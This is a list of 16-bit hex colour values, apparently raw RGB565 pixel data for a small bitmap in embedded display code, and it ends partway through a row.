0x9f76, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 